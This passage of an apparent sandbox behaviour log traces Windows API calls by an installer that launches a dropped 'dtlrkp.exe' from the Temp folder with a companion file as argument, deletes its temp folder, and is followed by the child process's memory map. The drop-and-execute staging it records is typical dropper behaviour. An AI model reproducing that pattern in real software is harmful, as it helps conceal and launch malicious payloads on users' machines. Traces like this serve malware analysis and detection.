lpLastWriteTime=0x19f6b8) returned 1 [0137.900] CloseHandle (hObject=0x28) returned 1 [0137.901] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0137.901] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0137.901] lstrcpynW (in: lpString1=0x428220, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0137.902] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0137.902] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\hzuplybmb", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\hzuplybmb") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\hzuplybmb" [0137.902] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\hzuplybmb", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x426710*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f3d8 | out: lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\hzuplybmb", lpProcessInformation=0x19f3d8*(hProcess=0x228, hThread=0x28, dwProcessId=0x870, dwThreadId=0x2d4)) returned 1 [0137.944] CloseHandle (hObject=0x28) returned 1 [0137.944] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0139.107] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0139.107] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0139.539] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0139.539] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0140.729] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0140.729] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0141.380] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0141.385] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0141.688] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0141.688] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0141.867] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0141.868] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0142.048] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0142.048] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0142.241] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0142.241] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0142.411] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0142.412] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0142.597] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0142.597] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0142.711] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0142.711] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0142.831] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0142.831] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0142.961] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0142.961] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0143.092] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0143.092] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0143.218] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0143.218] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0143.397] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0143.397] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0143.519] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0143.520] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0143.639] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0143.639] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0143.774] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0143.815] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x0 [0144.051] GetExitCodeProcess (in: hProcess=0x228, lpExitCode=0x19f3e4 | out: lpExitCode=0x19f3e4*=0x0) returned 1 [0144.052] CloseHandle (hObject=0x228) returned 1 [0144.052] DestroyWindow (hWnd=0x0) returned 0 [0144.052] EndDialog (hDlg=0xb030e, nResult=0x0) returned 1 [0144.071] CloseHandle (hObject=0x210) returned 1 [0144.071] lstrcpynW (in: lpString1=0x425f10, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp" [0144.071] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp") returned 48 [0144.071] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsa2679.tmp"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf2a2e09, ftCreationTime.dwHighDateTime=0x1d86053, ftLastAccessTime.dwLowDateTime=0xbf2a2e09, ftLastAccessTime.dwHighDateTime=0x1d86053, ftLastWriteTime.dwLowDateTime=0xbf2a2e09, ftLastWriteTime.dwHighDateTime=0x1d86053, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nsa2679.tmp", cAlternateFileName="")) returned 0x64e470 [0144.072] FindClose (in: hFindFile=0x64e470 | out: hFindFile=0x64e470) returned 1 [0144.072] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp") returned 48 [0144.072] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0144.072] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xc054ada8, ftLastAccessTime.dwHighDateTime=0x1d86053, ftLastWriteTime.dwLowDateTime=0xc054ada8, ftLastWriteTime.dwHighDateTime=0x1d86053, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x64e2f0 [0144.072] FindClose (in: hFindFile=0x64e2f0 | out: hFindFile=0x64e2f0) returned 1 [0144.073] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0144.073] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local") returned 31 [0144.073] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x64e2f0 [0144.073] FindClose (in: hFindFile=0x64e2f0 | out: hFindFile=0x64e2f0) returned 1 [0144.073] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local") returned 31 [0144.073] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData") returned 25 [0144.073] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x64e670 [0144.074] FindClose (in: hFindFile=0x64e670 | out: hFindFile=0x64e670) returned 1 [0144.074] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData") returned 25 [0144.074] lstrlenW (lpString="C:\\Users\\RDHJ0C~1") returned 17 [0144.074] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x64e8b0 [0144.074] FindClose (in: hFindFile=0x64e8b0 | out: hFindFile=0x64e8b0) returned 1 [0144.074] lstrlenW (lpString="C:\\Users\\RDHJ0C~1") returned 17 [0144.075] lstrlenW (lpString="C:\\Users") returned 8 [0144.075] FindFirstFileW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x64e470 [0144.075] FindClose (in: hFindFile=0x64e470 | out: hFindFile=0x64e470) returned 1 [0144.075] lstrlenW (lpString="C:\\Users") returned 8 [0144.075] lstrlenW (lpString="C:") returned 2 [0144.075] lstrlenW (lpString="C:") returned 2 [0144.075] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0144.075] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0144.076] lstrcpynW (in: lpString1=0x425710, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp" [0144.076] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp\\*.*") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp\\*.*" [0144.076] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp\\" [0144.076] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp\\") returned 49 [0144.076] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsa2679.tmp\\*.*"), lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf2a2e09, ftCreationTime.dwHighDateTime=0x1d86053, ftLastAccessTime.dwLowDateTime=0xbf2a2e09, ftLastAccessTime.dwHighDateTime=0x1d86053, ftLastWriteTime.dwLowDateTime=0xbf2a2e09, ftLastWriteTime.dwHighDateTime=0x1d86053, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x755f6b08, dwReserved1=0x755f6e7e, cFileName=".", cAlternateFileName="")) returned 0x64e2f0 [0144.076] FindNextFileW (in: hFindFile=0x64e2f0, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf2a2e09, ftCreationTime.dwHighDateTime=0x1d86053, ftLastAccessTime.dwLowDateTime=0xbf2a2e09, ftLastAccessTime.dwHighDateTime=0x1d86053, ftLastWriteTime.dwLowDateTime=0xbf2a2e09, ftLastWriteTime.dwHighDateTime=0x1d86053, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x755f6b08, dwReserved1=0x755f6e7e, cFileName="..", cAlternateFileName="")) returned 1 [0144.076] FindNextFileW (in: hFindFile=0x64e2f0, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf2a2e09, ftCreationTime.dwHighDateTime=0x1d86053, ftLastAccessTime.dwLowDateTime=0xbf2a2e09, ftLastAccessTime.dwHighDateTime=0x1d86053, ftLastWriteTime.dwLowDateTime=0xbf2a2e09, ftLastWriteTime.dwHighDateTime=0x1d86053, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x755f6b08, dwReserved1=0x755f6e7e, cFileName="..", cAlternateFileName="")) returned 0 [0144.076] FindClose (in: hFindFile=0x64e2f0 | out: hFindFile=0x64e2f0) returned 1 [0144.076] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsa2679.tmp"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf2a2e09, ftCreationTime.dwHighDateTime=0x1d86053, ftLastAccessTime.dwLowDateTime=0xbf2a2e09, ftLastAccessTime.dwHighDateTime=0x1d86053, ftLastWriteTime.dwLowDateTime=0xbf2a2e09, ftLastWriteTime.dwHighDateTime=0x1d86053, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nsa2679.tmp", cAlternateFileName="")) returned 0x64e2f0 [0144.077] FindClose (in: hFindFile=0x64e2f0 | out: hFindFile=0x64e2f0) returned 1 [0144.077] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp") returned 48 [0144.077] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp\\" [0144.077] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsa2679.tmp")) returned 0x10 [0144.077] SetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp\\", dwFileAttributes=0x10) returned 1 [0144.077] RemoveDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsa2679.tmp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsa2679.tmp")) returned 1 [0144.078] OleUninitialize () [0144.085] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0xdc0 Thread: id = 3 os_tid = 0xf08 Thread: id = 4 os_tid = 0xf1c Process: id = "2" image_name = "dtlrkp.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dtlrkp.exe" page_root = "0x7208f000" os_pid = "0x870" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcd0" cmd_line = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\hzuplybmb" cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 367 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 368 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 369 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 370 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 371 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 372 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 373 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 374 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 375 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 376 start_va = 0x400000 end_va = 0x404fff monitored = 1 entry_point = 0x401000 region_type = mapped_file name = "dtlrkp.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dtlrkp.exe") Region: id = 377 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 378 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 379 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 380 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 381 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 382 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 383 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 384 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 385 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 386 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 387 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 388 start_va = 0x500000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 389 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 390 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 391 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 392 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 393 start_va = 0x410000 end_va = 0x4cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 394 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 395 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 396 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 397 start_va = 0x76ed0000 end_va = 0x76f14fff monitored = 0 entry_point = 0x76eede90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 398 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 399 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 400 start_va = 0x540000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 401 start_va = 0x640000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 402 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 403 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 404 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 405 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: 